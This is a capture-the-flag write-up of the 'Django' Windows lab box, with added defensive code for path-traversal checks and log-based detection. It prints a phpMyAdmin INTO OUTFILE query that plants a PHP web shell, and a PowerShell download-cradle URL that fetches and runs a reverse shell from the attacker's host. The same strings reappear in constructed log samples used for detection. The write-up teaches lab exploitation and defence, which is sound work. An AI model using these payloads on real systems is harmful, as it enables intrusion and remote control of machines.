Today we are working on Django, a Windows box from https://online.pwntilldawn.com. Thanks to https://www.wizlynxgroup.com/ for creating this box. I’ve completed the other Windows boxes from this site, but this one was the first one that compelled me to do a writeup. Not that it was exactly difficult, but in my opinion the number of steps to get to System and the number of rabbit-holes make it more involved than the other Easy boxes. Let’s get started.
Initial Enumeration
Our nmap scan reveals a number of open ports to enumerate.
A deeper scan shows anonymous ftp access, so let’s start there. Run the scan for yourself to see details for the remainder of the ports.
Connecting to ftp, we find our first flag and a few other files that were no help.
Home FTP Exploit
After getting the flag from anonymous FTP, I moved on to enumerating other services on the box. This turned out to be a mistake that cost me several hours of investigating rabbit-holes. Only after I had seemingly exhausted my options did I come back to investigating Home FTP, where I found this exploit available:
Download the python script from exploit-db and modify the host to Django’s IP address.
I tested the script by reading some Windows system files, and also verified I could not read more privileged files like the SAM hashes. From our nmap scans and http enumeration, we know this box is running Xampp. A little online research on Xampp reveals that the software stores credentials in a file it helpfully names passwords.txt. Let’s try to read it with our Home FTP exploit. First define the file to be read in the python script.
Then run the exploit.
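The defensive counterpart to this step: the Home FTP issue is an arbitrary file read, and the control that prevents it is mapping every client-supplied path onto the FTP root and refusing anything that normalises to a location outside it. The following is an added example written for this writeup, not code from the exploit script or from Home FTP Server; the root C:\ftproot and the sample requests are constructed, and the check is done with Python's ntpath so it models Windows path rules on any host.

```python
import ntpath
from typing import Optional

# Hypothetical FTP root for the check (constructed; not a path from the box).
FTP_ROOT = r"C:\ftproot"


def resolve_within_root(root: str, requested: str) -> Optional[str]:
    """Map a client-supplied path onto the FTP root and refuse anything
    that does not stay inside it.

    Returns the normalised absolute path when it lies under `root`, or
    None when the request escapes it (.. traversal, a drive letter, a
    drive-relative path, etc.).
    """
    root_norm = ntpath.normpath(root).lower()

    # Windows treats / and \ alike; strip leading separators so that
    # "/../x" and "\..\x" are joined relative to the root rather than
    # being taken as absolute. This also neutralises a \\server\share prefix.
    cleaned = requested.replace("/", "\\").lstrip("\\")

    # A drive letter in the request ("C:\..." or "C:...") means the client
    # is naming an absolute location; never honour that.
    drive, _ = ntpath.splitdrive(cleaned)
    if drive:
        return None

    # Normalise AFTER joining so ".." segments are resolved against the root.
    candidate = ntpath.normpath(ntpath.join(ntpath.normpath(root), cleaned))

    # The request is acceptable only if the root is a prefix of the
    # resolved path in the path-component sense (not a string-prefix sense,
    # which would let C:\ftproot2 slip past C:\ftproot).
    try:
        common = ntpath.commonpath([root_norm, candidate.lower()])
    except ValueError:
        return None
    if common != root_norm:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: one benign, the rest attempts to leave the root.
    for req in ("pub/readme.txt",
                r"..\..\xampp\passwords.txt",
                "/../../windows/win.ini",
                r"C:\xampp\passwords.txt"):
        print(f"{req!r:40} -> {resolve_within_root(FTP_ROOT, req)}")
```

A server that applies this check still needs to open the resolved path, not the raw request, and it should resolve symbolic links and junctions the same way before the comparison; the example only covers the lexical part of the problem.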
PHPMyAdmin
Passwords.txt gives us creds to log into phpmyadmin, which can be used to manage MySQL databases. There is a link to phpmyadmin from the Xampp homepage (https, the http version doesn’t let us log on), or just navigate your browser to: https://django/phpmyadmin/
Once we log on, click on the Databases tab and we find our next flag.
I spent some time clicking through the various screens on phpmyadmin trying to find a way to upload a shell, but I didn’t have any luck. However, with a bit of time on Google I found this incredibly helpful site.
https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
This site in general is super helpful and I’ve used a number of their writeups in past CTFs. Per the writeup, we navigate to the SQL tab, paste in the following query and click Go.
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
We get confirmation our query was submitted, and now we can use our newly created php page for command execution. For example:
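Two things a defender should take from this step. First, INTO OUTFILE only works for an account holding the FILE privilege, and only where the server's secure_file_priv setting permits it: NULL disables file export entirely, an empty value imposes no restriction, and a directory confines writes to that directory. Setting it to a directory outside htdocs (it is read-only at runtime, so it goes in my.ini followed by a restart) closes this path. Second, the MySQL general query log records the query, so the write into a web root is detectable after the fact. The following is an added example, not code from the writeup or from phpMyAdmin; the log excerpt is constructed to resemble the MySQL general log format, and the htdocs path is the one named in the writeup.

```python
import ntpath
import re
from typing import List, Optional, Tuple

# Constructed general-log excerpt (time, connection id, command, argument).
# Line 3 is the writeup's query; the doubled backslashes are SQL escaping.
SAMPLE_GENERAL_LOG = """\
2020-05-01T10:00:01.000000Z\t   12 Connect\troot@localhost on  using TCP/IP
2020-05-01T10:00:02.000000Z\t   12 Query\tSHOW DATABASES
2020-05-01T10:00:03.000000Z\t   12 Query\tSELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\\\xampp\\\\htdocs\\\\backdoor.php"
2020-05-01T10:00:04.000000Z\t   13 Query\tSELECT * FROM customers INTO OUTFILE 'C:/exports/customers.csv'
2020-05-01T10:00:05.000000Z\t   13 Query\tSELECT 1 INTO DUMPFILE 'C:/xampp/htdocs/img/x.php'
"""

WEB_ROOTS = [r"C:\xampp\htdocs"]  # from the writeup; extend for other vhosts

LINE_RE = re.compile(r"^(?P<time>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
OUTFILE_RE = re.compile(
    r"""INTO\s+(?P<kind>OUTFILE|DUMPFILE)\s+(?P<q>['"])(?P<path>.*?)(?P=q)""",
    re.IGNORECASE,
)


def _normalise_path(raw: str) -> str:
    # A SQL literal "C:\\xampp" means C:\xampp on disk, and MySQL also
    # accepts forward slashes on Windows; normalise both to one form.
    return ntpath.normpath(raw.replace("\\\\", "\\").replace("/", "\\")).lower()


def _under(root: str, path: str) -> bool:
    """Component-wise containment check (c:\\xampp\\htdocs2 is not under htdocs)."""
    root = ntpath.normpath(root).lower()
    try:
        return ntpath.commonpath([root, path]) == root
    except ValueError:
        return False


def find_webroot_writes(log_text: str, web_roots: List[str]) -> List[Tuple[str, str, str]]:
    """Return (connection id, OUTFILE|DUMPFILE, normalised target path) for
    every file export in the general log that lands under a web root."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        f = OUTFILE_RE.search(m.group("arg"))
        if not f:
            continue
        path = _normalise_path(f.group("path"))
        if any(_under(root, path) for root in web_roots):
            hits.append((m.group("conn"), f.group("kind").upper(), path))
    return hits


def outfile_allowed(secure_file_priv: Optional[str], target: str) -> bool:
    """Model the secure_file_priv gate on INTO OUTFILE/DUMPFILE:
    None (NULL) disables export; "" allows any path; a directory confines it."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    return _under(secure_file_priv, _normalise_path(target))


if __name__ == "__main__":
    for conn, kind, path in find_webroot_writes(SAMPLE_GENERAL_LOG, WEB_ROOTS):
        print(f"connection {conn}: {kind} wrote {path}")
    for setting in (None, "", r"C:\xampp\mysql\uploads"):
        print(f"secure_file_priv={setting!r}: backdoor.php write allowed ->",
              outfile_allowed(setting, r"C:\xampp\htdocs\backdoor.php"))
```

The general log is off by default and verbose, so in practice the same rule is better expressed against an audit plugin or a query-log forwarder; the parsing logic is the same either way.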
Foothold
From here I diverged from the hackingarticles.in solution a bit because I wanted to get a non-meterpreter shell using a technique I was more familiar with. Ultimately, as you’ll see, I ended up back with Metasploit, but at least I gave a command shell a try first. :-P
The shell I used was one of the options from the Nishang PowerShell script, Invoke-PowerShellTcpOneLine.ps1. I learned about these scripts from IppSec so check out his videos for more info. My version of the one-liner looks like:
Make sure to launch both SimpleHTTPServer and a netcat listener on your Kali box, then upload the shell using the command execution backdoor. Navigate in your browser to:
https://django/backdoor.php?cmd=powershell "IEX(New-Object Net.WebClient).downloadString('http://10.66.66.194/shell.ps1')"
Interestingly, a few times I had to cancel the request and then wait a few more seconds before the upload and reverse shell executed.
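Every command run through the backdoor, including the download cradle above, passes through the Apache access log as a query string, which gives a defender three signals to work with: a request to a PHP file that is not part of the deployed application, a parameter value that starts with an interpreter name, and the IEX-plus-WebClient shape of the cradle itself. The following is an added example that scans constructed Apache combined-format log lines for those signals; it is not code from the writeup or from Nishang, and the baseline list of known PHP paths is an assumption standing in for a real inventory of the web root.

```python
import re
from typing import List, Set, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines; line 2 carries the writeup's download cradle.
SAMPLE_ACCESS_LOG = """\
10.66.66.194 - - [01/May/2020:10:05:01 +0000] "GET /backdoor.php?cmd=whoami HTTP/1.1" 200 35 "-" "Mozilla/5.0"
10.66.66.194 - - [01/May/2020:10:05:09 +0000] "GET /backdoor.php?cmd=powershell%20%22IEX(New-Object%20Net.WebClient).downloadString('http://10.66.66.194/shell.ps1')%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [01/May/2020:10:06:00 +0000] "GET /dashboard/index.php HTTP/1.1" 200 7415 "-" "Mozilla/5.0"
10.0.0.8 - - [01/May/2020:10:06:30 +0000] "GET /search.php?q=invoke%20meeting HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Assumed inventory of PHP entry points that belong to the deployed site.
BASELINE_PHP: Set[str] = {"/dashboard/index.php", "/search.php", "/phpmyadmin/index.php"}

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
INTERPRETER_RE = re.compile(r"^\s*(?:powershell(?:\.exe)?|pwsh|cmd(?:\.exe)?)\b", re.IGNORECASE)
EVALUATES_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
DOWNLOADS_RE = re.compile(
    r"Net\.WebClient|Download(?:String|File)|Invoke-WebRequest|\biwr\b", re.IGNORECASE
)


def is_download_cradle(text: str) -> bool:
    """True when the text both fetches content over the network and hands it
    to IEX/Invoke-Expression, the shape of the Nishang one-liner."""
    decoded = unquote(text)  # harmless if already decoded
    return EVALUATES_RE.search(decoded) is not None and DOWNLOADS_RE.search(decoded) is not None


def scan_access_log(log_text: str, baseline_php: Set[str]) -> List[Tuple[str, str, Tuple[str, ...]]]:
    """Return (client ip, path, sorted reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        path = parts.path
        reasons = set()
        # Signal 1: a PHP file the deployment does not know about.
        if path.lower().endswith(".php") and path not in baseline_php:
            reasons.add("unknown-php-script")
        # Signals 2 and 3: look inside every decoded query parameter.
        for _name, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_download_cradle(value):
                reasons.add("download-cradle")
            if INTERPRETER_RE.match(value):
                reasons.add("interpreter-invocation")
        if reasons:
            hits.append((m.group("ip"), path, tuple(sorted(reasons))))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan_access_log(SAMPLE_ACCESS_LOG, BASELINE_PHP):
        print(f"{ip} {path}: {', '.join(reasons)}")
```

Note what the first log line shows: a bare `cmd=whoami` is only caught by the baseline check, so the inventory of known PHP files (or file-integrity monitoring of htdocs, which would also catch the INTO OUTFILE write that created backdoor.php) is the signal that matters most; the cradle and interpreter patterns are confirmation, not the primary detection.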
User
If we go up one folder we find the third flag.
If we navigate to the Users folder and check user chuck.norris we get the fourth flag:
I feel I must briefly object to this user account. Certainly Chuck Norris should have system privileges to this box, but alas he does not. If we are going to get system, we’ll need to keep working.
Privesc
I attempted some manual privesc enumeration, but suffice it to say I didn’t get anywhere. I also checked the obvious applications (Xampp, Splunk, etc.) for local privesc vulnerabilities, but also came up empty. The version of .NET running on this box is 3.x, so WinPEAS is also not an option. I ultimately decided to migrate my command shell to a Meterpreter shell in order to run suggester, something I’ve been doing a lot lately for Windows privesc. To start with, we create the payload with msfvenom.
Upload the payload using our existing shell.
In Metasploit, set up exploit/multi/handler with the IP of our Kali box and the payload we created.
Get Metasploit listening and run the payload executable.
We get a Meterpreter session.
Background the session and run suggester, which gives us some options.
The third option executes. Details on CVE-2019-1458 from my research are minimal, but the vulnerability is listed as, “An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’.”
We have gotten SYSTEM on the box. Thanks for reading!